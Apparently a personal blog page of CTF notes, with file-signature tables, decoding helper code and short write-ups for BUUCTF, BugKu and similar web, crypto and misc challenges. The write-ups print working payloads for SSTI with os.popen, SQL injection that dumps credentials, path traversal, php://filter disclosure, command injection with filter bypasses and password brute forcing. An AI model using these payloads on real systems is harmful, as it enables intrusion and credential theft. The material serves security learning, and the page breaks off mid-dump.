<h1 class="menu-title">Andrew&#x27;s Blog</h1>
<div class="right-buttons">
<a href="https://gitlink.org.cn/dnrops/dnrops.gitlink.net.git" title="Git repository" aria-label="Git repository">
<i id="git-repository-button" class="fa fa-github"></i>
</a>
</div>
</div>
<div id="search-wrapper" class="hidden">
<form id="searchbar-outer" class="searchbar-outer">
<input type="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
</form>
<div id="searchresults-outer" class="searchresults-outer hidden">
<div id="searchresults-header" class="searchresults-header"></div>
<ul id="searchresults">
</ul>
</div>
</div>
<!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
<script>
// Mirror the sidebar state into ARIA attributes. `sidebar` is a variable set
// outside this script; only the comparison with 'visible' is used here.
(function (sidebarShown) {
    document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebarShown);
    document.getElementById('sidebar').setAttribute('aria-hidden', !sidebarShown);
    // Links in a hidden sidebar are taken out of the tab order.
    var linkTabIndex = sidebarShown ? 0 : -1;
    Array.from(document.querySelectorAll('#sidebar a')).forEach(function (anchor) {
        anchor.setAttribute('tabIndex', linkTabIndex);
    });
}(sidebar === 'visible'));
</script>
<div id="content" class="content">
<main>
<h1 id="ctf-note"><a class="header" href="#ctf-note">CTF Note</a></h1>
<h2 id="常见文件头部-magic-bytes"><a class="header" href="#常见文件头部-magic-bytes">常见文件头部 Magic Bytes</a></h2>
<div class="table-wrapper"><table><thead><tr><th>描述</th><th>扩展名</th><th>Magic Number</th></tr></thead><tbody>
<tr><td>Adobe Illustrator</td><td>.ai</td><td>25 50 44 46 [%PDF]</td></tr>
<tr><td>Bitmap graphic</td><td>.bmp</td><td>42 4D [BM]</td></tr>
<tr><td>Class File</td><td>.class</td><td>CA FE BA BE</td></tr>
<tr><td>JPEG graphic file</td><td>.jpg</td><td>FF D8</td></tr>
<tr><td>JPEG 2000 graphic file</td><td>.jp2</td><td>0000000C6A5020200D0A [….jP..]</td></tr>
<tr><td>GIF graphic file</td><td>.gif</td><td>47 49 46 38 [GIF8]</td></tr>
<tr><td>TIF graphic file</td><td>.tif</td><td>49 49 [II]</td></tr>
<tr><td>PNG graphic file</td><td>.png</td><td>89 50 4E 47 .PNG</td></tr>
<tr><td>WAV audio file</td><td>.wav</td><td>52 49 46 46 RIFF</td></tr>
<tr><td>ELF Linux EXE</td><td>.elf</td><td>7F 45 4C 46 .ELF</td></tr>
<tr><td>Photoshop Graphics</td><td>.psd</td><td>38 42 50 53 [8BPS]</td></tr>
<tr><td>Windows Meta File</td><td>.wmf</td><td>D7 CD C6 9A</td></tr>
<tr><td>MIDI file</td><td>.mid</td><td>4D 54 68 64 [MThd]</td></tr>
<tr><td>Icon file</td><td>.ico</td><td>00 00 01 00</td></tr>
<tr><td>MP3 file with ID3 identity tag</td><td>.mp3</td><td>49 44 33 [ID3]</td></tr>
<tr><td>AVI video file</td><td>.avi</td><td>52 49 46 46 [RIFF]</td></tr>
<tr><td>Flash Shockwave</td><td>.swf</td><td>46 57 53 [FWS]</td></tr>
<tr><td>Flash Video</td><td>.flv</td><td>46 4C 56 [FLV]</td></tr>
<tr><td>Mpeg 4 video file</td><td>.mp4</td><td>00 00 00 18 66 74 79 70 6D 70 34 32 [….ftypmp42]</td></tr>
<tr><td>MOV video file</td><td>.mov</td><td>6D 6F 6F 76 [….moov]</td></tr>
<tr><td>Windows Video file</td><td>.wmv</td><td>30 26 B2 75 8E 66 CF</td></tr>
<tr><td>Windows Audio file</td><td>.wma</td><td>30 26 B2 75 8E 66 CF</td></tr>
<tr><td>PKZip</td><td>.zip</td><td>50 4B 03 04 [PK]</td></tr>
<tr><td>GZip</td><td>.gz</td><td>1F 8B 08</td></tr>
<tr><td>Tar file</td><td>.tar</td><td>75 73 74 61 72 [ustar] (at offset 257, not at the start of the file)</td></tr>
<tr><td>Microsoft Installer</td><td>.msi</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>Object Code File</td><td>.obj</td><td>4C 01</td></tr>
<tr><td>Dynamic Library</td><td>.dll</td><td>4D 5A [MZ]</td></tr>
<tr><td>CAB Installer file</td><td>.cab</td><td>4D 53 43 46 [MSCF]</td></tr>
<tr><td>Executable file</td><td>.exe</td><td>4D 5A [MZ]</td></tr>
<tr><td>RAR file</td><td>.rar</td><td>52 61 72 21 1A 07 00 [Rar!…]</td></tr>
<tr><td>SYS file</td><td>.sys</td><td>4D 5A [MZ]</td></tr>
<tr><td>Help file</td><td>.hlp</td><td>3F 5F 03 00 [?_..]</td></tr>
<tr><td>VMWare Disk file</td><td>.vmdk</td><td>4B 44 4D 56 [KDMV]</td></tr>
<tr><td>Outlook Post Office file</td><td>.pst</td><td>21 42 44 4E 42 [!BDNB]</td></tr>
<tr><td>PDF Document</td><td>.pdf</td><td>25 50 44 46 [%PDF]</td></tr>
<tr><td>Word Document</td><td>.doc</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>RTF Document</td><td>.rtf</td><td>7B 5C 72 74 66 31 [{\rtf1]</td></tr>
<tr><td>Excel Document</td><td>.xls</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>PowerPoint Document</td><td>.ppt</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>Visio Document</td><td>.vsd</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>DOCX (Office 2010)</td><td>.docx</td><td>50 4B 03 04 [PK]</td></tr>
<tr><td>XLSX (Office 2010)</td><td>.xlsx</td><td>50 4B 03 04 [PK]</td></tr>
<tr><td>PPTX (Office 2010)</td><td>.pptx</td><td>50 4B 03 04 [PK]</td></tr>
<tr><td>Microsoft Database</td><td>.mdb</td><td>53 74 61 6E 64 61 72 64 20 4A 65 74</td></tr>
<tr><td>PostScript File</td><td>.ps</td><td>25 21 [%!]</td></tr>
<tr><td>Outlook Message File</td><td>.msg</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>EPS File</td><td>.eps</td><td>25 21 50 53 2D 41 64 6F 62 65 2D 33 2E 30 20 45 50 53 46 2D 33 20 30</td></tr>
<tr><td>Jar File</td><td>.jar</td><td>50 4B 03 04 14 00 08 00 08 00</td></tr>
<tr><td>SLN File</td><td>.sln</td><td>4D 69 63 72 6F 73 6F 66 74 20 56 69 73 75 61 6C 20 53 74 75 64 69 6F 20 53 6F 6C 75 74 69 6F 6E 20 46 69 6C 65</td></tr>
<tr><td>Zlib File</td><td>.zlib</td><td>78 9C</td></tr>
<tr><td>SDF File</td><td>.sdf</td><td>78 9C</td></tr>
</tbody></table>
</div>
<h2 id="python各版本对应的magic头"><a class="header" href="#python各版本对应的magic头">python各版本对应的magic头</a></h2>
<pre><code class="language-sh">Python 2.7|03f30d0a 00000000
Python 3.0|3b0c0d0a 00000000
Python 3.1|4f0c0d0a 00000000
Python 3.2|6c0c0d0a 00000000
Python 3.3|9e0c0d0a 00000000 00000000
Python 3.4|ee0c0d0a 00000000 00000000
Python 3.5|170d0d0a 00000000 00000000
Python 3.6|330d0d0a 00000000 00000000
Python 3.7|420d0d0a 00000000 00000000 00000000
Python 3.8|550d0d0a 00000000 00000000 00000000
Python 3.9|610d0d0a 00000000 00000000 00000000
Python 3.10|6f0d0d0a 00000000 00000000 00000000
</code></pre>
<h2 id="mics-思维导图"><a class="header" href="#mics-思维导图">Misc 思维导图</a></h2>
<p><img src="../../img_list/ctf%E6%9D%82%E9%A1%B9%E6%80%9D%E7%BB%B4%E5%AF%BC%E5%9B%BE.png" alt="ctf-杂项-思维导图" /></p>
<h2 id="ascii表"><a class="header" href="#ascii表">ASCII表</a></h2>
<p><img src="../../img_list/ascii.png" alt="ascii" /></p>
<h2 id="dagger-alphabet"><a class="header" href="#dagger-alphabet">dagger alphabet</a></h2>
<p><img src="../../img_list/image20230714003015911.png" alt="image-20230714003015911" /></p>
<h2 id="use-wireshark-filter-data"><a class="header" href="#use-wireshark-filter-data">Use wireshark filter data</a></h2>
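<pre><code class="language-sh"># Wireshark display-filter examples. Lines starting with # are notes, not filters.
# String literals need straight double quotes; typographic quotes (“ ”) are
# not accepted by the filter parser.
# Several lines chain alternative filters with and/or. Add parentheses when
# combining them for real: how and/or bind without parentheses may differ
# between Wireshark releases.
http.request.method == "POST" and http contains "admin"
ip.src eq 192.168.1.107 or ip.dst eq 192.168.1.107 and ip.addr == 192.168.1.107
tcp.port == 80 and udp.dstport == 80 or tcp.srcport &lt;= 10000
# Protocol names that work as a filter on their own, plus two negation forms.
tcp|udp|arp|icmp|http|smtp|ftp|dns|msnms|ip|ssl|not oicq|!bootp
eth.dst == A0:00:00:04:C5:84 and eth.src eq A0:00:00:04:C5:84 or eth.addr eq A0:00:00:04:C5:84
http.request.method == "GET" or http.request.method == "POST"
http.request.uri == "/img/logo-edu.gif" or http.request.uri contains "/img/logo-edu.gif" or http contains "GET"
</code></pre>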
<h2 id="use-ctf-party"><a class="header" href="#use-ctf-party">Use ctf-party</a></h2>
<pre><code class="language-ruby">require 'ctf_party'
require 'base64'
# Helper groups the author lists for ctf_party:
#   base64: to_b64, from_b64, b64? and bang versions
#   digest: md5, sha1, etc. and bang versions
#   flag: flag, flag!, flag? (apply/check a flag format)
#   rot: rot, rot13, rot_all and bang versions
#   hex: hex2dec, dec2hex, to_hex, from_hex, str2hex, hex2str, hex2bin, bin2hex, from_hexip, to_hexip and bang versions
#   case: randomcase, alternatecase and bang versions
#   cgi: urlencode, urlencode_component, urldecode, urldecode_component, htmlescape, htmlunescape and bang versions
#   bin: to_bin, from_bin, str2bin, bin2str, hex2bin, bin2hex and bang versions
#   leet: leet and bang version
#   dec: dec2str, str2dec, hex2dec, dec2hex and bang versions
#   xor: ulxor, alxor, urxor, arxor and bang versions
#   misc: istrip and bang version

# Sample calls; each result is printed with p. The order matters because
# to_b64! is a bang method and is presumably applied to `flag` in place.
flag = 'flag{xs}'
p Base64.strict_encode64(flag) # standard-library encoder
p flag.flag?
p flag.to_b64!
p 'SGVsbG8gd29ybGQh'.b64?
p 'mystr'.rot13
p 'mystr'.rot(shift: 11)
p 'mystr'.sha2_512
p "flag".to_bin
p "https://xinghuo.xfyun.cn/desk".urlencode_component

# Walk the even indices of a sample array; the print itself is left disabled.
numbers = [1, 2, 3, 4, 5]
numbers.each_index do |idx|
  next unless idx.even?
  # p numbers[idx]
end
</code></pre>
<h2 id="use-dd"><a class="header" href="#use-dd">Use dd</a></h2>
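<pre><code class="language-shell"># Carve the tail of a file with dd: copy everything after the first N bytes.
# Placeholders: 源文件名 = source file, 开始分离的字节数 = number of bytes to skip,
# 目标文件名 = output file.
dd if=源文件名 bs=1 skip=开始分离的字节数 of=目标文件名
# Operands:
#   if=file      input file (default: standard input)
#   of=file      output file (default: standard output)
#   bs=bytes     read and write block size; replaces ibs and obs
#   skip=blocks  skip this many input blocks before copying starts
# skip counts blocks, so bs=1 turns it into a byte offset at the cost of one
# read/write per byte. With GNU dd, iflag=skip_bytes keeps skip in bytes while
# allowing a larger bs.
# Example (IDF Lab challenge “抓到一只苍蝇”): drop the first 364 bytes of s1.
dd if=s1 bs=1 skip=364 of=d1
</code></pre>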
<h2 id="文件合并"><a class="header" href="#文件合并">文件合并</a></h2>
<pre><code class="language-sh">#将所有以chapter开头的文件按文件名从小到大的顺序合并输出到book文件中
cat chapter01 chapter02 chapter03 &gt; book
</code></pre>
<h2 id="file-headers"><a class="header" href="#file-headers">file headers</a></h2>
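<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>// (label, leading bytes as upper-case hex) pairs for quick file-type checks.
// A matching prefix is only a hint about the format: it says nothing about
// whether the rest of the file is well-formed, so do not use it on its own to
// decide that an upload or attachment is safe to open.
let header_vec = vec![
    ("JPEG", "FFD8FF"),        // the 4th byte (E0, E1, ...) differs between JFIF and EXIF files
    ("png", "89504E47"),
    ("gif", "47494638"),
    ("tiff", "49492A00"),      // little-endian "II" variant
    ("bmp", "424D"),           // "BM"; the bytes that follow are the file size
    ("zip", "504B0304"),       // also docx/xlsx/pptx/jar
    ("rar", "52617221"),
    ("psd", "38425053"),
    ("rtf", "7B5C727466"),     // "{\rtf"
    ("xml", "3C3F786D6C"),     // "&lt;?xml"
    ("html", "68746D6C3E"),    // the text "html&gt;"; HTML has no fixed leading bytes
    ("pdf", "255044462D312E"), // "%PDF-1."
    ("wav", "52494646"),       // "RIFF" (shared with AVI); "WAVE" follows at offset 8
    ("pcap", "D4C3B2A1"),      // little-endian capture file
];
<span class="boring">}</span></code></pre></pre>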
<h2 id="image-rgb-分层"><a class="header" href="#image-rgb-分层">Image RGB 分层</a></h2>
<pre><code class="language-toml">[dependencies]
image = "0.23"
</code></pre>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>/// Split `xx_00029.png` into three images, each carrying one colour channel,
/// and save them as `output_layer1.png`, `output_layer2.png` and `output_layer3.png`.
///
/// Panics (through `unwrap`) if the input cannot be opened or an output
/// cannot be written.
fn fen_rgb_ceng() {
    // Load the source picture and read its size.
    // NOTE(review): `dimensions` and `pixels` need the image crate's
    // GenericImageView trait in scope; the listing does not show that `use` line.
    let source = image::open("xx_00029.png").unwrap();
    let (w, h) = source.dimensions();

    // One blank RGB canvas per channel.
    let mut red_layer = image::RgbImage::new(w, h);
    let mut green_layer = image::RgbImage::new(w, h);
    let mut blue_layer = image::RgbImage::new(w, h);

    // Copy each channel of every source pixel into its own canvas.
    for (x, y, pixel) in source.pixels() {
        let [r, g, b, _alpha] = pixel.0;
        red_layer.get_pixel_mut(x, y).0[0] = r;
        green_layer.get_pixel_mut(x, y).0[1] = g;
        blue_layer.get_pixel_mut(x, y).0[2] = b;
    }

    // Write each layer to its own PNG.
    red_layer.save("output_layer1.png").unwrap();
    green_layer.save("output_layer2.png").unwrap();
    blue_layer.save("output_layer3.png").unwrap();
}
<span class="boring">}</span></code></pre></pre>
<p>get RGBA vec</p>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>// Collect, in row-major order, every pixel of xx_00034.png whose colour is
// exactly (254, 254, 254) or (0, 0, 0); the alpha value is kept but not tested.
let image = image::open("xx_00034.png").unwrap();
let (width, height) = image.dimensions();
let mut rgba_vec: Vec&lt;(u8, u8, u8, u8)&gt; = vec![];
// Declared in the original listing but never written to here.
let mut buf: Vec&lt;u8&gt; = vec![];
for y in 0..height {
    for x in 0..width {
        let [r, g, b, a] = image.get_pixel(x, y).0;
        let wanted = matches!((r, g, b), (254, 254, 254) | (0, 0, 0));
        if wanted {
            rgba_vec.push((r, g, b, a));
        }
    }
}
<span class="boring">}</span></code></pre></pre>
<p>create image from RGBA vec</p>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>/// Draw `rgba_vec` as a square image, row by row, and save it as `output.png`.
///
/// The side length is the integer part of `sqrt(rgba_vec.len())`, so entries
/// beyond `side * side` are not drawn. Panics (through `unwrap`) if the file
/// cannot be written.
fn create_image_from_rgba_vec(rgba_vec: Vec&lt;(u8, u8, u8, u8)&gt;) {
    // NOTE(review): ImageBuffer and Rgba come from the image crate; the
    // listing does not show the `use` line.
    let side = f64::sqrt(rgba_vec.len() as f64) as u32;
    // Build the picture by asking for the colour of each (x, y) in turn.
    let img: ImageBuffer&lt;Rgba&lt;u8&gt;, Vec&lt;_&gt;&gt; = ImageBuffer::from_fn(side, side, |x, y| {
        let (r, g, b, a) = rgba_vec[(y * side + x) as usize];
        Rgba([r, g, b, a])
    });
    img.save("output.png").unwrap();
}
<span class="boring">}</span></code></pre></pre>
<h2 id="rsa-参数解释"><a class="header" href="#rsa-参数解释">RSA 参数解释</a></h2>
<p>RSA使用公钥与私钥配对来进行加密和解密。其中 p、q 是两个大素数,n=pq;f(n)=(p-1)(q-1) 是欧拉函数值;e 是与 f(n) 互质的整数;d 是满足 e*d≡1 (mod f(n)) 的整数;m 是明文,c 是密文。公钥为 (n, e),私钥为 d:加密 c ≡ m^e (mod n),解密 m ≡ c^d (mod n)。</p>
<h2 id="ccompress-and-decompress-zlib"><a class="header" href="#ccompress-and-decompress-zlib">compress and decompress zlib</a></h2>
<pre><code class="language-python">import zlib
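# Compress a sample payload with zlib's default settings.
data = b'Hello, world!'
compressed_data = zlib.compress(data)
print('Compressed data:', compressed_data)
# Decompress it again. The function is zlib.decompress(); the zlib module has
# no uncompress(), so that name raises AttributeError.
# When the compressed bytes come from an untrusted source, bound the output
# instead (zlib.decompressobj().decompress(data, max_length)) so that a small
# input cannot expand into an arbitrarily large buffer.
uncompressed_data = zlib.decompress(compressed_data)
print('Uncompressed data:', uncompressed_data)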
</code></pre>
<h2 id="simple_ssti_1"><a class="header" href="#simple_ssti_1">Simple_SSTI_1</a></h2>
<pre><code># %27 means '
# %20 means space
http://114.67.175.224:11296/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
</code></pre>
<h2 id="simple_ssti_2"><a class="header" href="#simple_ssti_2">Simple_SSTI_2</a></h2>
<pre><code>http://114.67.175.224:16482/?flag={{config}}
flag{46fe7552dcee5c1bba675349353506d5}
</code></pre>
<h2 id="flask_fileupload"><a class="header" href="#flask_fileupload">Flask_FileUpload</a></h2>
<pre><code>1.echo "import os\nos.system('cat ./flag')" &gt; get_floag.txt
2.mv get_flag.txt get_flag.jpg
3.upload get_flag.jpg
flag{e58da7f2b3307deb9eb1d276cb8d524a}
</code></pre>
<h2 id="simple-image"><a class="header" href="#simple-image">Simple image</a></h2>
<pre><code>download the image
1.mv image.png image.html
2.cat image.html
3.get "107;&amp;#101;&amp;#121;&amp;#123;&amp;#121;&amp;#111;&amp;#117;&amp;#32;&amp;#97;&amp;#114;&amp;#101;&amp;#32;&amp;#114;&amp;#105;&amp;#103;&amp;#104;&amp;#116;&amp;#125" to Vec&lt;u8&gt;
4.decode Vec&lt;u8&gt; to string get key{you are right}
</code></pre>
<h1 id="shihua-write-up"><a class="header" href="#shihua-write-up">shihua Write up</a></h1>
<p>1.  hxxx
Flag:flag{flag_in_hexdecimal:)}
<img src="../../img_list/67ec08a2b61b488e90b3b8e7f8861e72tplvk3u1fbpfcpzoom1.png" alt="" />
3.  map
Flag:flag{mapisthekey}
<img src="../../img_list/1516932f69f04c37964401291e2ff5a0tplvk3u1fbpfcpzoom1.png" alt="" />
4.  bxxwxx
Flag:ctf{show_me_the_money}</p>
<pre><code>binwalk -e bxxwxx
cd _bxxwxx.extracted
cat flag.txt
</code></pre>
<p>5.  Zip0
Flag:flag{pseudo_encryption}</p>
<pre><code>use imhex open zip0.zip
remove password
save zip0.zip
open flag.png
</code></pre>
<p><img src="../../img_list/e8598a148e8a4d24af53e03e095042f5tplvk3u1fbpfcpzoom1.png" alt="" />
<img src="../../img_list/a1d750b73b9147ec873eec9dc8f17adatplvk3u1fbpfcpzoom1.png" alt="" />
6.  sxxxhxxx
flag:ctf{welcom_to_upc_im}</p>
<pre><code>steghide extract -sf stxxhxxx.jpeg
cat info
</code></pre>
<p><img src="../../img_list/863e3b69ded140809acd459002836899tplvk3u1fbpfcpzoom1.png" alt="" />
7.  Caesar
Flag:flag{this_is_rot_14:)}
<img src="../../img_list/7df6272003ee42148f74c45ffb0996b7tplvk3u1fbpfcpzoom1.png" alt="" />
8.  Vig
Flag:flag{vigenere_cipher}
<img src="../../img_list/9c507a09c94a4d4e8a3763240005fb64tplvk3u1fbpfcpzoom1.png" alt="" />
9.  xor
Flag:flag{flag1sxor}
<img src="../../img_list/7a8b79be0c1c479cab3022d2ddda0409tplvk3u1fbpfcpzoom1.png" alt="" />
10.  Easyre
Flag:flag{this_Is_a_EasyRe}
<img src="../../img_list/1433bcbbdde544c28ed706af89e99786tplvk3u1fbpfcpzoom1.png" alt="" /></p>
<h1 id="buuctf"><a class="header" href="#buuctf">BUUCTF</a></h1>
<h2 id="linux-labs-1"><a class="header" href="#linux-labs-1">Linux Labs 1</a></h2>
<pre><code>1.run "ssh -p 29381 root@node4.buuoj.cn" to connect ssh
2.enter password 123456
3.cd ..
4.cat flag.txt
flag{374920b5-66a9-4779-9172-5176eae58b85}
</code></pre>
<h2 id="buu-lfi-course-1"><a class="header" href="#buu-lfi-course-1">BUU LFI COURSE 1</a></h2>
<pre><code>http://81402a4e-a4c6-493f-b96e-8bf140d81bec.node4.buuoj.cn:81/?file=../../../flag
flag{241f21aa-3d5b-4540-9afb-3d1fd7da9197}
</code></pre>
<h2 id="buu-brute-1"><a class="header" href="#buu-brute-1">BUU BRUTE 1</a></h2>
<pre><code>url = "http://d1c5dde5-7e42-4f0a-a0a4-464717740958.node4.buuoj.cn:81/?username=admin&amp;password={1000..10000}"
1.for loop get body
2.if body contains("flag") println body
</code></pre>
<h2 id="buu-sql-course-1"><a class="header" href="#buu-sql-course-1">BUU SQL COURSE 1</a></h2>
<pre><code>1. open http://29c00a23-aea5-4f2d-a2b8-d4f24d8eea48.node4.buuoj.cn:81/backend/content_detail.php?id=-1%20union%20select%201,(select%20group_concat(username)%20from%20admin) to get username
2. open http://29c00a23-aea5-4f2d-a2b8-d4f24d8eea48.node4.buuoj.cn:81/backend/content_detail.php?id=-1%20union%20select%201,(select%20group_concat(password)%20from%20admin) to get user password
3. enter username and password, click login to see flag
</code></pre>
<h2 id="极客大挑战-2019easysql"><a class="header" href="#极客大挑战-2019easysql">[极客大挑战 2019]EasySQL</a></h2>
<pre><code>username:admin' or 1=1#
password:123456
flag{331c23f4-983a-4a29-b38a-d9c93b1734f2}
</code></pre>
<h2 id="hctf-2018warmup"><a class="header" href="#hctf-2018warmup">[HCTF 2018]WarmUp</a></h2>
<pre><code>1. ? URL ecode =&gt; %3F
2. %3F URL ecode =&gt; %253F
3. open url to get flag http://290d8b27-9f57-4e6e-b2b6-42bc0991ede1.node4.buuoj.cn:81/?file=source.php%253F../../../../../ffffllllaaaagggg
4. or open http://290d8b27-9f57-4e6e-b2b6-42bc0991ede1.node4.buuoj.cn:81/?file=source.php?../../../../../ffffllllaaaagggg
</code></pre>
<h2 id="极客大挑战-2019havefun"><a class="header" href="#极客大挑战-2019havefun">[极客大挑战 2019]Havefun</a></h2>
<pre><code>1.open source code cansee this
`
&lt;!--
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}
--&gt;
`
2. parse cat param http://352c414e-7254-40cc-b802-f66498fc1bd4.node4.buuoj.cn:81/?cat=dog get flag
</code></pre>
<h2 id="actf2020-新生赛include"><a class="header" href="#actf2020-新生赛include">[ACTF2020 新生赛]Include</a></h2>
<pre><code>1. click tip to open http://4237a679-489a-465c-9936-d7b0d68aba04.node4.buuoj.cn:81/?file=flag.php
2. open hackbar load url and change ?file=flag.php to ?file=php://filter/read=convert.base64-encode/resource=flag.php
3. copy base64 and open base_64.py decode base64 can see flag
</code></pre>
<h2 id="actf2020-新生赛exec"><a class="header" href="#actf2020-新生赛exec">[ACTF2020 新生赛]Exec</a></h2>
<pre><code>1.enter 127.0.0.1;ls click Enter can see we can run cmd
2.enter 127.0.0.1;ls ../../../;cat ../../../flag can get flag
flag{8d209996-9c2b-48e8-bdac-3b6ae15fb98b}
</code></pre>
<h2 id="强网杯-2019随便注"><a class="header" href="#强网杯-2019随便注">[强网杯 2019]随便注</a></h2>
<pre><code>1. enter "1';show databases#" and click submit can se all databases
2. enter "1';use supersqli;show tables#" and click submit canse all tables in supersqli
3. enter "1';use supersqli;show columns from `1919810931114514`#" and click submit
4. enter "1';use supersqli;show columns from words#" and click submit
5. enter "1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);#" and click submit
6. enter "1' or 1=1#" an click can see flag
</code></pre>
<h2 id="gxyctf2019ping-ping-ping25"><a class="header" href="#gxyctf2019ping-ping-ping25">[GXYCTF2019]Ping Ping Ping25</a></h2>
<pre><code>1. URL/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php see source code cansee flag
</code></pre>
<h2 id="suctf-2019easysql"><a class="header" href="#suctf-2019easysql">[SUCTF 2019]EasySQL</a></h2>
<pre><code>1. enter "1;show databases;"
2. "1;show tables;"
3. "1;set sql_mode=pipes_as_concat;select 1"
</code></pre>
<h2 id="md5"><a class="header" href="#md5">MD5</a></h2>
<pre><code>https://buuoj.cn/challenges#MD5
1.unzip file and open .txt copy md5 code
2.open https://www.bejson.com/enc/md5dsc/ to look up the MD5 hash (MD5 cannot be decoded; the site matches it against known values)
flag{admin1}
</code></pre>
<h2 id="一眼就解密"><a class="header" href="#一眼就解密">一眼就解密</a></h2>
<pre><code>https://buuoj.cn/challenges#%E4%B8%80%E7%9C%BC%E5%B0%B1%E8%A7%A3%E5%AF%86
1.canse it's a base64 code
2.so decode base64 can get the flag
</code></pre>
<h2 id="url编码"><a class="header" href="#url编码">Url编码</a></h2>
<pre><code>1.unzip file and open .txt copy url code
1.can find that is a URL encoded
2.so decode the code
flag{and 1=1}
</code></pre>
<h2 id="看我回旋踢"><a class="header" href="#看我回旋踢">看我回旋踢</a></h2>
<pre><code>1.unzip file and open .txt copy url code
1.can find that is a synt encoded 凯撒密码
2.so decode the code use python/caesar_cipher.py
flag{5cd1004d-86a5-46d8-b720-beb5ba0417e1}
</code></pre>
<h2 id="摩丝"><a class="header" href="#摩丝">摩丝</a></h2>
<pre><code>1. unzip file and open .txt copy morse code
2. decode morse code with rust can get the flag
flag{ILOVEYOU}
</code></pre>
<h2 id="password"><a class="header" href="#password">password</a></h2>
<pre><code>1. unzip file and open .txt
2. can see the kay is 10 letter
3. so 张三 to zs and key{zs19900315}
flag{zs19900315}
</code></pre>
<h2 id="极客大挑战-2019secret-file"><a class="header" href="#极客大挑战-2019secret-file">[极客大挑战 2019]Secret File</a></h2>
<pre><code>1. open and view page source
2. open URL/Archive_room.php and view page source
3. copy URL/action.php open 3 times
4. open fiddler click URL/action.php can see
`
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;!--
secr3t.php
--&gt;
&lt;/html&gt;
`
5. open URL/secr3t.php can see flag.php but can't see it
6. so open URL/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
7. decode base64 can get flag
flag{9835de9d-5d61-4551-9b44-0c1955464828}
</code></pre>
<h2 id="极客大挑战-2019lovesql"><a class="header" href="#极客大挑战-2019lovesql">[极客大挑战 2019]LoveSQL</a></h2>
<pre><code>1. open URL/check.php?username=admin' or '1'='1&amp;password=1
2. open URL/check.php?username=1' union select 1,2,3%23&amp;password=1
3. open URL/check.php?username=1' union select 1,database(),version()%23&amp;password=1
4. open URL/check.php?username=1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 %23&amp;password=1 get geekuser is password
5. open URL /check.php?username=1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from geek.l0ve1ysq1 %23&amp;password=1
os open /check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&amp;password=1
can see flag
</code></pre>
<h1 id="n1book-题目"><a class="header" href="#n1book-题目">N1book 题目</a></h1>
<h2 id="第一章web-第一题"><a class="header" href="#第一章web-第一题">第一章Web 第一题</a></h2>
<p>本测试题来自N1BOOK考察常见的信息收集能力。flag被分割成3块藏在3处你能都找出来么</p>
<pre><code class="language-sh">dirsearch -u http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/
</code></pre>
<p><img src="../../img_list/image2023060512021724116859385699101.png" alt="image-20230605120217241" />
open http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/flag1_is_her3_fun.txt get flag1 flag{info_1</p>
<pre><code class="language-sh">#get flag3
vim -r index.php.swp
# p0rtant_hack}
</code></pre>
<p><img src="../../img_list/image2023060511595739916859385780262.png" alt="image-20230605115957399" />
open http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/index.php~ get flag2 s_v3ry_im
flag{info_1s_v3ry_imp0rtant_hack}</p>
<h1 id="ctf-初赛-writeup"><a class="header" href="#ctf-初赛-writeup">CTF 初赛 WriteUP</a></h1>
<h2 id="1-签到"><a class="header" href="#1-签到">1 签到</a></h2>
<pre><code class="language-sh">strings qiandao.bmp
</code></pre>
<p><img src="../../img_list/image20230606161057495.png" alt="image-20230606161057495" />
flag{c545574d-9ce4-4ce7-997c-1f281d54a7c2}</p>
<h2 id="2-arp-1"><a class="header" href="#2-arp-1">2 ARP-1</a></h2>
<p>分析流量包发现只有一个字母变化
<img src="../../img_list/image20230606162223573.png" alt="image-20230606162223573" />
flag{2cbd116b-5fe9-4252-b9d9-7d794a519d59}</p>
<h2 id="5-cc_1"><a class="header" href="#5-cc_1">5 cc_1</a></h2>
<p>已知
<img src="../../img_list/image20230606161312058.png" alt="image-20230606161312058" />
点击魔法棒
<img src="../../img_list/image20230606161517274.png" alt="image-20230606161517274" />
得到flag
<img src="../../img_list/image20230606161605814.png" alt="image-20230606161605814" />
flag{e84a3130-c4b9-492c-9ab2-d395a43cbc31}</p>
<h2 id="8-re_ez"><a class="header" href="#8-re_ez">8 re_ez</a></h2>
<p>用ghidra打开re1.exe,经过分析发现在.data section存在以下数据</p>
<pre><code>// .data
// ram:14002a000-ram:14002a1ff
//
DAT_14002a000 XREF[1]: 14000024c(*)
14002a000 01 ?? 01h
14002a001 00 ?? 00h
14002a002 00 ?? 00h
14002a003 00 ?? 00h
14002a004 00 ?? 00h
14002a005 00 ?? 00h
14002a006 00 ?? 00h
14002a007 00 ?? 00h
14002a008 01 ?? 01h
14002a009 00 ?? 00h
14002a00a 00 ?? 00h
14002a00b 00 ?? 00h
